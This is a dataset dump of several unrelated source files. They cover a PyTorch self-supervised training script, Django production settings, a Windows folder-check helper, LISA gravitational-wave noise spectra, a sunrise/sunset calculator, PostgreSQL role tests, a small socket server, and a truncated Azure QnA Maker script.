{"seq_id":"272611681","text":"import torch, torchvision\nimport torch.nn as nn\nimport torch.utils as utils\nimport torch.nn.functional as F\nimport torchvision.transforms as transforms\nimport datasets, cresnet, augmentations\nimport os, time, argparse, math\nfrom utils import AverageMeter, accuracy, sigmoid_rampup\nfrom torch.autograd import Variable\nfrom datasets import check_dataloader\n\nparser = argparse.ArgumentParser(description='Multi-task learning')\n\nparser.add_argument('--dataset',required=True,default=False) #cifar10,cifar100\nparser.add_argument('--arch', '-a',required=True, metavar='ARCH', default='resnetself') #metavar : description\nparser.add_argument('--auxiliary',default=False) #rotation color exemplar if joint, rotation_color\nparser.add_argument('--augmentation',type=int,default=False) # 4 or 2 in rotation, 3 6 2 in color permutation\n\n\nparser.add_argument('--epochs', default=80, type=int, metavar='N',\n                    help='number of total epochs to run')\nparser.add_argument('-b', '--batch-size', default=128, type=int,\n                    metavar='N', help='mini-batch size (default: 128)')\nparser.add_argument('--lr', '--learning-rate', default=0.1, type=float,\n                    metavar='LR', help='initial learning rate')\nparser.add_argument('--range-of-lr', nargs='+', type=int,help='1234 1234 1234',default=[40,60]) #--range-of-lr 1234 1234 1234 \nparser.add_argument('--ema-decay',type=float,default=0.999) \nparser.add_argument('--ema-class-loss',action='store_true') #auxiliary\nparser.add_argument('--val-freq', type=int, default=1000)\nparser.add_argument('--teacher', action='store_true')\n\nbest_prec1 = 0\nargs = parser.parse_args()\ndef main():\n    \n    global args,best_prec1\n    \n    log_directory = [args.dataset,args.arch,args.auxiliary,args.augmentation]\n    while False in log_directory:\n        log_directory.remove(False)\n    for i in range(len(log_directory)):\n        log_directory[i] = str(log_directory[i])\n    log_directory = 
'./logs/'+'/'.join(log_directory) + '/'\n \n \n\n start_time = time.strftime('%Y-%m-%d %I:%M:%S %p', time.localtime(time.time()))\n if not os.path.exists(log_directory):\n os.makedirs(log_directory)\n file = open(log_directory+start_time+'.txt','w')\n\n \n file.write('architecture: {0}\\n'\n 'total epochs: {1}\\n'\n 'batch size: {2}\\n'\n 'start learning rate: {3}\\n'\n 'range of learning rate: {4}\\n'\n 'dataset: {5}\\n'\n 'auxiliary type: {6}\\n'\n 'number of augmentation: {7}\\n'\n 'ema-auxiliary-loss: {8}\\n'\n 'teacher: {9}'\n .format(\n args.arch,\n args.epochs,\n args.batch_size,\n args.lr,\n args.range_of_lr,\n args.dataset,\n args.auxiliary,\n args.augmentation,\n args.ema_class_loss,\n args.teacher\n \n ))\n file.close()\n \n trainset,testloader, valloader = datasets.__dict__[args.dataset](batch=args.batch_size)\n\n trainloader = check_dataloader(trainset,args.val_freq,args.batch_size)\n\n \n\n \n if args.auxiliary =='rotation':\n auxiliary_classes = 4\n elif args.auxiliary =='color' and args.augmentation == 2:\n auxiliary_classes = 6\n elif args.auxiliary == 'color' and args.augmentation == 3:\n auxiliary_classes = 3\n elif args.auxiliary == 'color' and args.augmentation == 6:\n auxiliary_classes = 6\n\n \n\n\n\n if args.arch == 'resnetself':\n model = nn.DataParallel(cresnet.__dict__[args.arch](num_classes=int(args.dataset[5:]),num_auxiliary_classes=auxiliary_classes)).cuda()\n else:\n model = nn.DataParallel(cresnet.__dict__[args.arch](num_classes=int(args.dataset[5:]))).cuda()\n \n criterion = nn.CrossEntropyLoss().cuda()\n optimizer = torch.optim.SGD(model.parameters(), lr=args.lr, momentum=0.9, weight_decay=0.0001)\n scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer,milestones=args.range_of_lr, gamma=0.1, last_epoch=-1)\n \n for epoch in range(args.epochs):\n s = time.time()\n train(trainloader, model, criterion, optimizer,epoch,auxiliary=args.auxiliary,augmentation=args.augmentation,start_time=start_time,log_directory=log_directory)\n scheduler.step()\n \n\n \n # evaluate on validation set\n print(\"Evaluating the primary model:\")\n prec1 = validate(testloader, model, optimizer,criterion,auxiliary=args.auxiliary,start_time=start_time,log_directory=log_directory)\n \n \n \n # remember best prec@1 and save checkpoint\n is_best = prec1 > best_prec1\n best_prec1 = max(prec1, best_prec1)\n\n if epoch > 0 and epoch % 10 == 0:\n save_checkpoint({\n 'epoch': epoch + 1,\n 'state_dict':model.state_dict(),\n 'best_prec1': best_prec1,\n }, is_best, filename=os.path.join(log_directory, 'checkpoint.pth'))\n\n save_checkpoint({\n 'state_dict':model.state_dict(),\n 'best_prec1': best_prec1,\n }, is_best, filename=os.path.join(log_directory, 'model.pth'))\n\n\n\ndef train(trainloader, model, criterion, optimizer,epoch,auxiliary,augmentation,start_time,log_directory):\n \n\n\n losses = AverageMeter()\n acc = AverageMeter()\n acc_aux = AverageMeter()\n regression_loss = nn.MSELoss().cuda()\n # switch to train mode\n model.train()\n \n\n for i, (input, target) in enumerate(trainloader):\n\n # measure data loading time\n target = target.cuda()\n input_var = input.cuda()\n target_var = target\n batch_size =input_var.shape[0]\n if auxiliary == 'rotation':\n if augmentation == 2:\n input_var,target_aux = augmentations.__dict__['rotation'](input_var,target_var)\n elif augmentation == 4:\n input_var,target_aux = augmentations.__dict__['rotation_4'](input_var,target_var)\n else:\n assert False, 'choose augmentation'\n\n num_aug = input_var.shape[0] // batch_size\n optimizer.zero_grad() \n 
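# forward pass returns main-task and auxiliary-task logits\n            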
output, output_aux = model(input_var)\n output = output[::num_aug]\n soft = F.log_softmax(output_aux,dim=1)\n loss = criterion(output,target_var) + torch.mean(-torch.sum(target_aux*soft,dim=1))\n output, output_aux= output.float(), output_aux.float()\n prec1 = accuracy(output.data, target_var)[0]\n prec_aux = accuracy(output_aux.data,torch.argmax(target_aux,dim=1))[0]\n acc_aux.update(prec_aux.item(),input_var.size(0)) \n loss.backward()\n optimizer.step()\n loss = loss.float()\n acc.update(prec1.item(), input_var.size(0))\n losses.update(loss.item(), input_var.size(0))\n \n\n\n elif auxiliary == 'color':\n if augmentation == 2:\n input_var,target_aux = augmentations.__dict__['color'](input_var,target_var)\n \n elif augmentation == 6:\n input_var,target_aux = augmentations.__dict__['color_6'](input_var,target_var) \n \n elif augmentation == 3:\n input_var,target_aux = augmentations.__dict__['color_3'](input_var,target_var) \n num_aug = input_var.shape[0] // batch_size\n optimizer.zero_grad() \n output, output_aux = model(input_var)\n output = output[::num_aug]\n soft = F.log_softmax(output_aux,dim=1)\n loss = criterion(output,target_var) + torch.mean(-torch.sum(target_aux*soft,dim=1))\n output, output_aux= output.float(), output_aux.float()\n prec1 = accuracy(output.data, target_var)[0]\n prec_aux = accuracy(output_aux.data,torch.argmax(target_aux,dim=1))[0]\n acc_aux.update(prec_aux.item(),input_var.size(0)) \n loss.backward()\n optimizer.step()\n loss = loss.float()\n acc.update(prec1.item(), input_var.size(0))\n losses.update(loss.item(), input_var.size(0))\n elif auxiliary == False: \n\n output = model(input_var)\n loss = criterion(output, target_var)\n optimizer.zero_grad()\n output = output.float()\n prec1 = accuracy(output.data, target)[0] \n loss.backward()\n optimizer.step()\n loss = loss.float()\n acc.update(prec1.item(), input_var.size(0)) \n losses.update(loss.item(), input_var.size(0))\n \n # measure elapsed time\n tm = time.localtime(time.time())\n string = time.strftime('%Y-%m-%d %I:%M:%S %p', tm)\n file = open(log_directory+start_time+'.txt','a')\n if i % 50 == 0:\n print('{0} -'\n ' Epoch: [{1}][{2}/{3}] -'\n ' learning rate: {4:0.5e} -'\n ' Loss: {5:0.4f} -'\n ' main acc: {6:0.2f} %'\n ' auxiliary acc: {7:0.2f} %'.format(string,\n epoch, i, len(trainloader),optimizer.param_groups[0]['lr'],\n losses.val,acc.val,acc_aux.val))\n \n file.write('{0} -'\n ' Epoch: [{1}][{2}/{3}] -'\n ' learning rate: {4:0.5e} -'\n ' Loss: {5:0.4f} -'\n ' acc: {6:0.2f} %'\n ' auxiliary acc: {7:0.2f} %\\n'.format(string,\n epoch, i, len(trainloader),optimizer.param_groups[0]['lr'],\n losses.val,acc.val,acc_aux.val)) \n print('average training accuracy: {acc.avg:.3f}'\n .format(acc=acc)) \n file.write('average training accuracy: {acc.avg:.3f}\\n'\n .format(acc=acc))\n file.close()\n\ndef validate(testloader, model,optimizer,criterion,auxiliary,start_time,log_directory):\n \"\"\"\n Run evaluation\n \"\"\"\n losses = AverageMeter()\n acc = AverageMeter()\n acc_aux = AverageMeter()\n regression_loss = nn.MSELoss().cuda()\n # switch to evaluate mode\n model.eval()\n\n with torch.no_grad():\n for i, (input, target) in enumerate(testloader):\n target = target.cuda()\n input_var = input.cuda()\n target_var = target.cuda()\n\n \n if auxiliary == False: \n # compute output\n output = model(input_var)\n \n else:\n output, output_aux = model(input_var)\n \n loss = criterion(output,target_var)\n output = output.float()\n loss = loss.float()\n\n # measure accuracy and record loss\n prec1 = 
accuracy(output.data, target)[0]\n                losses.update(loss.item(), input.size(0))\n                acc.update(prec1.item(), input.size(0))\n\n            # measure elapsed time\n            tm = time.localtime(time.time())\n            string = time.strftime('%Y-%m-%d %I:%M:%S %p', tm)\n            file = open(log_directory+start_time+'.txt','a')\n            if i % 50 == 0:\n                print('{0} -'\n                      ' Epoch: [{1}/{2}] -'\n                      ' learning rate: {3:0.5e} -'\n                      ' Loss: {4:0.4f} -'\n                      ' acc: {5:0.2f} %'.format(string,\n                      i, len(testloader),optimizer.param_groups[0]['lr'],\n                      losses.val,acc.val))\n                file.write('{0} -'\n                           ' Epoch: [{1}/{2}] -'\n                           ' learning rate: {3:0.5e} -'\n                           ' Loss: {4:0.4f} -'\n                           ' acc: {5:0.2f} %\\n'.format(string,\n                           i, len(testloader),optimizer.param_groups[0]['lr'],\n                           losses.val,acc.val))\n    print('average validation accuracy: {acc.avg:.3f}'\n          .format(acc=acc))\n    file.write('---------------------------------------------\\n'\n               '|          average validation accuracy      |\\n'\n               '|                {acc.avg:.3f}              |\\n'\n               '---------------------------------------------\\n'\n               .format(acc=acc))\n    file.close()\n    return acc.avg\n\ndef save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):\n    \"\"\"\n    Save the training model\n    \"\"\"\n    torch.save(state, filename)\n\n\n\n\n\nif __name__ == '__main__':  # run the main() function only when this file is executed directly\n    main()\n","sub_path":"student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":12737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
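A minimal, self-contained sketch of the joint objective used in student.py above; the function and variable names here are illustrative, not taken from the file:

import torch
import torch.nn.functional as F

def joint_loss(output, output_aux, target, target_aux, num_aug):
    # The augmented batch holds num_aug stacked copies per image, so stride
    # the main-head logits back down to one prediction per original image.
    main_loss = F.cross_entropy(output[::num_aug], target)
    # Soft-target cross-entropy against the auxiliary (rotation/color) labels.
    aux_loss = torch.mean(-torch.sum(target_aux * F.log_softmax(output_aux, dim=1), dim=1))
    return main_loss + aux_loss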
{"seq_id":"570244079","text":"\"\"\"\nSettings for production. Be sure to keep all *secrets* in environment\nvariables. The following environment variables can be set:\n\n * ``DJANGO_SETTINGS_MODULE`` -- \"{{ project_name }}.settings.prod\"\n * ``DJANGO_SECRET_KEY`` -- Unique secret key for this project\n * ``DJANGO_DB_NAME`` -- Database name.\n * ``DJANGO_DB_USER`` -- Database username.\n * ``DJANGO_DB_PASSWORD`` -- Database password. Leave empty for no password.\n * ``DJANGO_DB_HOST`` -- Database host. Leave empty for localhost.\n * ``DJANGO_DB_PORT`` -- Database port. Leave empty for defaults.\n\n.. tip:: These can be set in Apache VirtualHost entries using the SetEnv\n   directive.\n\"\"\"\n\nimport os\n\n# Import base settings to make it easier to extend.\nfrom .base import *\n\nDEBUG = False\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = (\n    (\"Jonathan Zaffke\", \"jonathan.zaffke@aacc.net\"),\n    (\"Spencer Judd\", \"spencer.judd@aacc.net\"),\n)\nMANAGERS = ADMINS\n\nSECRET_KEY = os.environ[\"DJANGO_SECRET_KEY\"]\n\n","sub_path":"project_name/settings/prod.py","file_name":"prod.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"597129236","text":"import subprocess as sp\n\ndef get_dir_out(dire):\n    out = \"\"\n    backslash = \"\\\\\"\n    process = sp.Popen(f'dir /ad /b \"{str(dire)}\" 1>nul 2>nul && (echo is a folder) || (echo is not a folder)', stdout=sp.PIPE, shell=True)  # .replace(backslash, \"/\")\n    searching = True\n    while searching:\n        o = process.stdout.readline()\n        if o == b'':\n            searching = False\n            break\n        else:\n            out += o.decode(\"utf-8\")\n    return out\n\ndef check_if_folder(path, iftrue = True):\n    out = get_dir_out(path)\n    #print (path)\n    #print (repr(out))\n    #print (out == \"is a folder\\r\\n\")\n    if out == \"is a folder\\r\\n\":\n        return iftrue\n    else:\n        return False","sub_path":"isdir.py","file_name":"isdir.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"391088256","text":"'''\nCode modified from github.com/sharanbngr/blip\n'''\n\nfrom __future__ import division\nimport numpy as np\nimport types\n\ncspeed = 3e8\narmlength = 2.5e9\n\nfstar = cspeed / (2*np.pi*armlength)\n\ndef fundamental_noise_spectrum(freqs, Np=4e-41, Na=1.44e-48):\n\n    '''\n    Creates a frequency array of fundamental noise estimates for LISA. Currently we consider only\n    position and acceleration noise sources. The default values are specifications pulled from the 2017 LISA proposal\n    noise estimations.\n\n    Parameters\n    -----------\n\n    freqs : float\n        A numpy array of frequencies\n\n    Np (optional) : float\n        Position noise value\n\n    Na (optional) : float\n        Acceleration noise level\n\n\n    Returns\n    ---------\n\n    Sp, Sa : float\n        Frequency arrays of the position and acceleration noise for each satellite\n    '''\n\n    Sp = Np*(1 + (2e-3/freqs)**4)\n    Sa = Na*(1 + 16e-8/freqs**2)*(1 + (freqs/8e-3)**4)*(1.0/(2*np.pi*freqs)**4)\n\n    return Sp, Sa\n\n
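# Note: Sp is the position-noise PSD with a (2e-3 Hz / f)^4 low-frequency\n# reddening term, while Sa converts the test-mass acceleration noise to\n# displacement-equivalent units through the 1/(2*pi*f)^4 factor; both feed\n# the Michelson and TDI spectra assembled below.\n\n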
def aet_noise_spectrum(freqs, Np=4e-41, Na=1.44e-48):\n    '''\n    Calculates A, E, and T channel noise spectra for a stationary LISA. Following the definitions in\n    Adams & Cornish, http://iopscience.iop.org/article/10.1088/0264-9381/18/17/308\n\n\n    Parameters\n    -----------\n\n    freqs : float\n        A numpy array of frequencies\n\n    Np (optional) : float\n        Position noise value\n\n    Na (optional) : float\n        Acceleration noise level\n\n\n    Returns\n    ---------\n\n    C_aet : float\n        3x3 covariance matrix of noise PSDs for the A, E and T TDI channels\n\n\n    '''\n    # Calculate f0\n    f0 = freqs/(2*fstar)\n\n    # Get the X, Y, Z covariance matrix\n    C_xyz = xyz_noise_spectrum(freqs, Np, Na)\n\n    ## Unpack the xyz matrix to make assembling the aet matrix easier\n    CXX, CYY, CZZ = C_xyz[0, 0], C_xyz[1, 1], C_xyz[2, 2]\n    CXY, CXZ, CYZ = C_xyz[0, 1], C_xyz[0, 2], C_xyz[1, 2]\n\n\n    ## construct AET matrix elements\n    CAA = (1/9) * (4*CXX + CYY + CZZ - 2*CXY - 2*np.conj(CXY) - 2*CXZ - 2*np.conj(CXZ) + \\\n                    CYZ + np.conj(CYZ))\n\n    CEE = (1/3) * (CZZ + CYY - CYZ - np.conj(CYZ))\n\n    CTT = (1/9) * (CXX + CYY + CZZ + CXY + np.conj(CXY) + CXZ + np.conj(CXZ) + CYZ + np.conj(CYZ))\n\n    CAE = (1/(3*np.sqrt(3))) * (CYY - CZZ - CYZ + np.conj(CYZ) + 2*CXZ - 2*CXY)\n\n    CAT = (1/9) * (2*CXX - CYY - CZZ + 2*CXY - np.conj(CXY) + 2*CXZ - np.conj(CXZ) - CYZ - np.conj(CYZ))\n\n    CET = (1/(3*np.sqrt(3))) * (CZZ - CYY - CYZ + np.conj(CYZ) + np.conj(CXZ) - np.conj(CXY))\n\n    C_aet = np.array([ [CAA, CAE, CAT] , \\\n                       [np.conj(CAE), CEE, CET], \\\n                       [np.conj(CAT), np.conj(CET), CTT] ])\n\n\n    return C_aet\n\ndef xyz_noise_spectrum(freqs, Np=4e-41, Na=1.44e-48):\n\n    '''\n    Calculates X, Y, Z channel noise spectra for a stationary LISA. Following the definitions in\n    Adams & Cornish, http://iopscience.iop.org/article/10.1088/0264-9381/18/17/308\n\n\n    Parameters\n    -----------\n\n    freqs : float\n        A numpy array of frequencies\n\n    Np (optional) : float\n        Position noise value\n\n    Na (optional) : float\n        Acceleration noise level\n\n\n    Returns\n    ---------\n\n    C_xyz : float\n        3x3 covariance matrix of noise PSDs for the X, Y and Z TDI channels\n\n\n    '''\n\n    # Calculate f0\n    f0 = freqs/(2*fstar)\n\n    C_mich = mich_noise_spectrum(freqs, Np, Na)\n\n    ## Noise spectra of the X, Y and Z channels\n    #SX = 4*SM1* np.sin(2*f0)**2\n\n    C_xyz = 4 * np.sin(2*f0)**2 * C_mich\n\n    return C_xyz\n\ndef mich_noise_spectrum(freqs, Np=4e-41, Na=1.44e-48):\n\n    '''\n    Calculates Michelson channel noise spectra for a stationary LISA. Following the definitions in\n    Adams & Cornish, http://iopscience.iop.org/article/10.1088/0264-9381/18/17/308. We assume that\n    there is no phase noise.\n\n\n    Parameters\n    -----------\n\n    freqs : float\n        A numpy array of frequencies\n\n    Np (optional) : float\n        Position noise value\n\n    Na (optional) : float\n        Acceleration noise level\n\n\n    Returns\n    ---------\n\n    C_mich : float\n        3x3 covariance matrix of noise PSDs for the three Michelson channels\n\n\n    '''\n\n    # Calculate f0\n    f0 = freqs/(2*fstar)\n\n    # Get Sp and Sa\n    Sp, Sa = fundamental_noise_spectrum(freqs, Np, Na)\n\n\n    ## Noise spectra of the michelson channels\n    S_auto = 4.0 * (2.0 * Sa * (1.0 + (np.cos(2*f0))**2) + Sp)\n    S_cross = (-2 * Sp - 8 * Sa) * np.cos(2*f0)\n\n    C_mich = np.array([[S_auto, S_cross, S_cross], [S_cross, S_auto, S_cross], [S_cross, S_cross, S_auto]])\n\n    return C_mich\n","sub_path":"instrNoise.py","file_name":"instrNoise.py","file_ext":"py","file_size_in_byte":4588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
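A short usage sketch for the instrNoise module above, assuming instrNoise.py is importable from the working directory; the frequency grid is only an example:

import numpy as np
from instrNoise import aet_noise_spectrum

freqs = np.logspace(-4, -1, 500)   # example grid across the LISA band, in Hz
C_aet = aet_noise_spectrum(freqs)  # 3x3 matrix of per-frequency (cross-)spectra
S_AA = np.real(C_aet[0, 0])        # A-channel auto-spectrum
S_TT = np.real(C_aet[2, 2])        # T (null) channel auto-spectrum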
{"seq_id":"186706288","text":"\"\"\"sunriseset.py: Algorithm to calculate sunrise and sunset.\"\"\"\n\nimport math\n\n\n__author__ = \"Raido Pahtma\"\n__license__ = \"MIT\"\n\n\nversion = \"0.1.0\"\n\n\nZENITH_OFFICIAL = 90+50/60.0\nZENITH_CIVIL = 96\nZENITH_NAUTICAL = 102\nZENITH_ASTRONOMICAL = 108\n\n\ndef sun_time(zenith, rising, year, month, day, longitude, latitude, local=0):\n    \"\"\"\n    Sunrise/Sunset Algorithm\n\n    Source:\n        Almanac for Computers, 1990\n        published by Nautical Almanac Office\n        United States Naval Observatory\n        Washington, DC 20392\n\n    Inputs:\n        day, month, year: date of sunrise/sunset\n        latitude, longitude: location for sunrise/sunset\n        zenith: Sun's zenith for sunrise/sunset\n          official     = 90 degrees 50'\n          civil        = 96 degrees\n          nautical     = 102 degrees\n          astronomical = 108 degrees\n\n        NOTE: longitude is positive for East and negative for West\n        NOTE: the algorithm assumes the use of a calculator with the\n        trig functions in \"degree\" (rather than \"radian\") mode. Most\n        programming languages assume radian arguments, requiring back\n        and forth conversions. The factor is 180/pi. So, for instance,\n        the equation RA = atan(0.91764 * tan(L)) would be coded as RA\n        = (180/pi)*atan(0.91764 * tan((pi/180)*L)) to give a degree\n        answer with a degree input for L.\n\n    Output:\n        Hours from 00:00:00 as a float.\n    \"\"\"\n\n    \"\"\"\n    1. first calculate the day of the year\n        N1 = floor(275 * month / 9)\n        N2 = floor((month + 9) / 12)\n        N3 = (1 + floor((year - 4 * floor(year / 4) + 2) / 3))\n        N = N1 - (N2 * N3) + day - 30\n    \"\"\"\n    N1 = math.floor(275 * month / 9)\n    N2 = math.floor((month + 9) / 12)\n    N3 = (1 + math.floor((year - 4 * math.floor(year / 4) + 2) / 3))\n    N = N1 - (N2 * N3) + day - 30\n\n    \"\"\"\n    2. convert the longitude to hour value and calculate an approximate time\n\n        lngHour = longitude / 15\n\n        if rising time is desired:\n            t = N + ((6 - lngHour) / 24)\n        if setting time is desired:\n            t = N + ((18 - lngHour) / 24)\n    \"\"\"\n    lngh = longitude / 15\n\n    if rising:\n        t = N + ((6 - lngh) / 24)\n    else:\n        t = N + ((18 - lngh) / 24)\n\n    \"\"\"\n    3. calculate the Sun's mean anomaly\n\n        M = (0.9856 * t) - 3.289\n    \"\"\"\n    M = (0.9856 * t) - 3.289\n\n    \"\"\"\n    4. calculate the Sun's true longitude\n\n        L = M + (1.916 * sin(M)) + (0.020 * sin(2 * M)) + 282.634\n        NOTE: L potentially needs to be adjusted into the range [0,360) by adding/subtracting 360\n    \"\"\"\n    L = M + (1.916 * math.sin((math.pi/180)*M)) + (0.020 * math.sin(2*(math.pi/180)*M)) + 282.634\n\n    while L < 0:\n        L += 360\n    while L > 360:\n        L -= 360\n\n    \"\"\"\n    5a. 
calculate the Sun's right ascension\n\n RA = atan(0.91764 * tan(L))\n NOTE: RA potentially needs to be adjusted into the range [0,360) by adding/subtracting 360\n \"\"\"\n RA = (180/math.pi)*math.atan(0.91764 * math.tan((math.pi/180)*L))\n\n while RA < 0:\n RA += 360\n while RA > 360:\n RA -= 360\n\n \"\"\"\n 5b. right ascension value needs to be in the same quadrant as L\n\n Lquadrant = (floor( L/90)) * 90\n RAquadrant = (floor(RA/90)) * 90\n RA = RA + (Lquadrant - RAquadrant)\n \"\"\"\n L_quad = (math.floor(L/90)) * 90\n RA_quad = (math.floor(RA/90)) * 90\n RA = RA + (L_quad - RA_quad)\n\n \"\"\"\n 5c. right ascension value needs to be converted into hours\n\n RA = RA / 15\n \"\"\"\n RA = RA / 15\n\n \"\"\"\n 6. calculate the Sun's declination\n\n sinDec = 0.39782 * sin(L)\n cosDec = cos(asin(sinDec))\n \"\"\"\n sin_dec = 0.39782 * math.sin((math.pi/180)*L)\n cos_dec = math.cos(math.asin(sin_dec))\n\n \"\"\"\n 7a. calculate the Sun's local hour angle\n\n cosH = (cos(zenith) - (sinDec * sin(latitude))) / (cosDec * cos(latitude))\n\n if (cosH > 1)\n the sun never rises on this location (on the specified date)\n if (cosH < -1)\n the sun never sets on this location (on the specified date)\n \"\"\"\n cos_h = (math.cos((math.pi/180)*zenith) - (sin_dec * math.sin((math.pi/180)*latitude))) / (cos_dec * math.cos((math.pi/180)*latitude))\n if cos_h > 1:\n if rising is True:\n #print \"no sunrise\"\n return -1\n else:\n #print \"no sunrise, but setting requested!\"\n #cos_h = cos_h - 1 # This does not seem to fix it\n return -1\n\n if cos_h < -1:\n if rising is False:\n #print \"no sunset\"\n return -1\n else:\n #print \"no sunset, but rising requested!\"\n #cos_h = cos_h + 1 # This does not seem to fix it\n return -1\n\n \"\"\"\n 7b. finish calculating H and convert into hours\n\n if if rising time is desired:\n H = 360 - acos(cosH)\n if setting time is desired:\n H = acos(cosH)\n\n H = H / 15\n \"\"\"\n if rising:\n H = 360 - (180/math.pi)*math.acos(cos_h)\n else:\n H = (180/math.pi)*math.acos(cos_h)\n\n H = H / 15\n\n \"\"\"\n 8. calculate local mean time of rising/setting\n\n T = H + RA - (0.06571 * t) - 6.622\n \"\"\"\n T = H + RA - (0.06571 * t) - 6.622\n\n \"\"\"\n 9. adjust back to UTC\n\n UT = T - lngHour\n NOTE: UT potentially needs to be adjusted into the range [0,24) by adding/subtracting 24\n \"\"\"\n UT = T - lngh\n\n \"\"\"\n 10. 
convert UT value to local time zone of latitude/longitude\n\n localT = UT + localOffset\n \"\"\"\n local_T = UT + local\n while local_T < 0:\n local_T += 24\n while local_T > 24:\n local_T -= 24\n\n return local_T\n\n\ndef convert_time(ut):\n \"\"\"\n Convert the sun_time float value to a string.\n \"\"\"\n if ut < 0:\n return \"XX:XX:XX\"\n hrs = int(ut)\n mns = int((ut - hrs)*60)\n secs = int((ut - hrs - mns/60.0)*3600)\n\n return \"%02u:%02u:%02u\" % (hrs, mns, secs)\n","sub_path":"sunriseset/sunriseset.py","file_name":"sunriseset.py","file_ext":"py","file_size_in_byte":5997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"296064739","text":"import os\nimport pytest\nimport testinfra.utils.ansible_runner\n\ntestinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(\n os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('all')\n\n\ndef get_facts(host):\n return host.ansible(\"setup\")[\"ansible_facts\"]\n\n\ndef get_psql_version():\n return os.getenv('PSQL_VERSION', '9.6')\n\n\ndef get_config_path(host, type):\n facts = get_facts(host)\n\n psql = get_psql_version()\n\n if facts['ansible_os_family'] == 'Debian':\n if type == 'hba':\n return '/etc/postgresql/' + psql + '/main/pg_hba.conf'\n else:\n return '/etc/postgresql/' + psql + '/main/postgresql.conf'\n\n if type == 'hba':\n return '/var/lib/pgsql/' + psql + '/data/pg_hba.conf'\n\n return '/var/lib/pgsql/' + psql + '/data/postgresql.conf'\n\n\ndef test_hosts_file(host):\n f = host.file('/etc/hosts')\n\n assert f.exists\n assert f.user == 'root'\n assert f.group == 'root'\n\n\n@pytest.mark.parametrize(\"config_type\", [\n (\"hba\"),\n (\"conf\"),\n])\ndef test_configuration_files(host, config_type):\n config_path = get_config_path(host, config_type)\n\n f = host.file(config_path)\n assert f.exists\n assert f.user == 'postgres'\n assert f.group == 'postgres'\n\n\ndef test_hba(host):\n config_path = get_config_path(host, 'hba')\n\n hba = host.file(config_path)\n assert hba.contains('0.0.0.0/0')\n assert hba.contains('::/0')\n\n\ndef test_service(host):\n facts = get_facts(host)\n\n if facts['ansible_os_family'] == 'Debian':\n assert host.service('postgresql').is_running\n else:\n assert host.service('postgresql-' + get_psql_version()).is_running\n","sub_path":"roles/mrlesmithjr.postgresql/molecule/shared/tests/test_default.py","file_name":"test_default.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"37596139","text":"import socket\nimport os\nimport time\nfrom _thread import *\nimport threading\n\nprint(\"Starting Server...\")\nServerSocket = socket.socket()\nhost = \"127.0.0.1\"\nport = int(input(\"Enter Server Port: \"))\nthread_count = 0\ntry:\n ServerSocket.bind((host, port))\nexcept socket.error as e:\n print(f\"Error: {e}\")\n print(\"Closing Server...\")\n exit\n\nprint(\"Waiting for a Connection..\")\nServerSocket.listen(10)\n\nres = \".\"\n\n\ndef listener():\n client, address = ServerSocket.accept()\n print(\"Master Connected\")\n print(\"Connected to: \" + address[0] + \":\" + str(address[1]))\n client.send(str.encode(\"Welcome to the Server\\n\"))\n try:\n while True:\n global res\n data = client.recv(2048)\n msg = data.decode()\n if not data:\n print(f\"Master shutting down.\")\n break\n if msg != \".\":\n print(f\"Received from master: {msg}\")\n client.sendall(res.encode())\n res = \".\"\n except Exception:\n client.close()\n\n\nthreads = []\n\n\ndef file_writer():\n 
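\"\"\"Read console input into the global res buffer for the listener; typing 'exit' closes the server.\"\"\"\n    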
while True:\n user_input = input()\n global res\n res = user_input\n if res == \"exit\":\n print(\"Closing Server...\")\n exit()\n\n\nt1 = threading.Thread(target=listener)\nt2 = threading.Thread(target=file_writer)\n\nt1.start()\ntime.sleep(0.1)\nt2.start()\n\nt1.join()\nServerSocket.close()\n","sub_path":"sem-5/cn-lab/lab-3/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"54029833","text":"import os\nimport time\nimport json\nfrom azure.cognitiveservices.knowledge.qnamaker import QnAMakerClient\nfrom azure.cognitiveservices.knowledge.qnamaker.models import QnADTO, MetadataDTO, CreateKbDTO, OperationStateType, UpdateKbOperationDTO, UpdateKbOperationDTOAdd\nfrom msrest.authentication import CognitiveServicesCredentials\n\n# Check credentials\nkey_var_name = 'QNAMAKER_KEY'\nif not key_var_name in os.environ:\n raise Exception('Please set/export the environment variable: {}'.format(key_var_name))\nsubscription_key = os.environ[key_var_name]\n\nhost_var_name = 'QNAMAKER_HOST'\nif not host_var_name in os.environ:\n raise Exception('Please set/export the environment variable: {}'.format(host_var_name))\nhost = os.environ[host_var_name]\n\n# Define utility function for status monitoring\n# Helper functions\ndef _monitor_operation(client, operation):\n\n for i in range(1000):\n if operation.operation_state in [OperationStateType.not_started, OperationStateType.running]:\n print(\"Waiting for operation: {} to complete.\".format(operation.operation_id))\n time.sleep(5)\n operation = client.operations.get_details(operation_id=operation.operation_id)\n else:\n break\n if operation.operation_state != OperationStateType.succeeded:\n raise Exception(\"Operation {} failed to complete.\".format(operation.operation_id))\n return operation\n\n \n\nclient = QnAMakerClient(endpoint=host, credentials=CognitiveServicesCredentials(subscription_key))\n\n\n#Load Chatty data\nwith open('faq_all.json') as f:\n data = json.load(f)\n\nnew_data = []\nfor item in data:\n if not isinstance(item['question'],float):\n new_data.append(item)\n\n#intent-descrption dict\nwith open('intent_description.json') as g:\n desc = json.load(g)\n intdict=dict()\nfor item in desc:\n intdict[item[0]]=item[1]\n\n\ndef create_kb(client):\n\n\n qna = []\n record = new_data[0]\n qna.append(\n QnADTO(\n answer = intdict[record['intent']],\n questions = [record['question']],\n metadata 